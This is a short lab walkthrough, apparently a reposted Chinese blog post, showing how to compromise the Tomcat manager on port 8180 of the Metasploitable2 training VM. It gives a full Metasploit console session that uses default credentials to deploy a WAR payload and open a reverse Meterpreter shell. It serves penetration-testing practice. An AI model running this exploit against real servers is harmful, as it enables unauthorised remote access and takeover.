Metasploitable2 - tcp port 8180 - tomcat
来源:互联网 发布:盆腔炎导致不孕 知乎 编辑:程序博客网 时间:2024/06/06 05:16
如果知道tomcat页面/manager的管理帐号与密码,可部署精心制作的war文件,以获得服务器相关的权限。
msf > use exploit/multi/http/tomcat_mgr_deploymsf exploit(tomcat_mgr_deploy) > show optionsModule options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port USERNAME no The username to authenticate as VHOST no HTTP server virtual hostExploit target: Id Name -- ---- 0 Automaticmsf exploit(tomcat_mgr_deploy) > set PASSWORD tomcatPASSWORD => tomcatmsf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.111RHOST => 192.168.1.111msf exploit(tomcat_mgr_deploy) > set USERNAME tomcatUSERNAME => tomcatmsf exploit(tomcat_mgr_deploy) > set RPORT 8180RPORT => 8180msf exploit(tomcat_mgr_deploy) > run[*] Started reverse handler on 192.168.1.113:4444[*] Attempting to automatically select a target...[*] Automatically selected target "Linux x86"[*] Uploading 6476 bytes as XLwr0WTDQwQK4R7ahMzSCdcKSA.war ...[*] Executing /XLwr0WTDQwQK4R7ahMzSCdcKSA/RPba2ccc2dFiBsijOiDZGBA9V04A0U.jsp...[*] Undeploying XLwr0WTDQwQK4R7ahMzSCdcKSA ...[*] Sending stage (30355 bytes) to 192.168.1.111[*] Meterpreter session 4 opened (192.168.1.113:4444 -> 192.168.1.111:51992) at 2014-08-01 00:43:41 -0400meterpreter > getuidServer username: tomcat55
参考地址:
http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/
http://web.nmsu.edu/~alejbaca/portfolio/senior_project/2-Metasploitable%202%20Exploitability%20Guide%20_%20SecurityStreet.pdf
0 0
- Metasploitable2 - tcp port 8180 - tomcat
- Metasploitable2 - tcp port 2049 - NFS
- Metasploitable2 - tcp port 2121 - Proftp
- Metasploitable2 - tcp port 3306 - mysql
- Metasploitable2 - tcp port 3632 - distccd
- Metasploitable2 - tcp port 5432 - postgres
- Metasploitable2 - tcp port 5900 - vnc
- Metasploitable2 - tcp port 6667 - ircd
- tcp-ip Port Numbers
- nginx tomcat ip port
- Metasploitable2使用指南
- Port Number 1253/tcp | What is Port 1253/tcp?
- The Smallest TCP Port Redirector
- TCP/IP学习--port scanner
- Metasploit2 - tcp port 21 - vsftpd
- Metasploit2 - tcp port 1099 - RMI
- Multipath TCP Port for Android
- 端口 TCP/IP =PORT NUMBERS
- 我的三年软件测试之路----金阳光老师自传
- leetcode做题总结,题目Add Two Numbers /Add Binary 2011/11/01&2012/04/02
- SGI STL 和 VS下STL的vector不同内存增长策略
- 又来一段 简单的代码 简单的字符压缩
- 黑马程序员-----------JdK1.5新特性(一)---可变参数,增强for循环,自动装箱与拆箱,静态导入,枚举
- Metasploitable2 - tcp port 8180 - tomcat
- ViewPager的adapter
- 畅通工程续
- WebStorm的安装和配置
- APUE笔记二
- UVA 11732 - strcmp() Anyone?(Trie)
- leetcode做题总结,题目First Missing Positive 2012/03/08
- 使用CCScrollView + CCMenu
- 程序员通过什么渠道接外包项目和兼职编程工作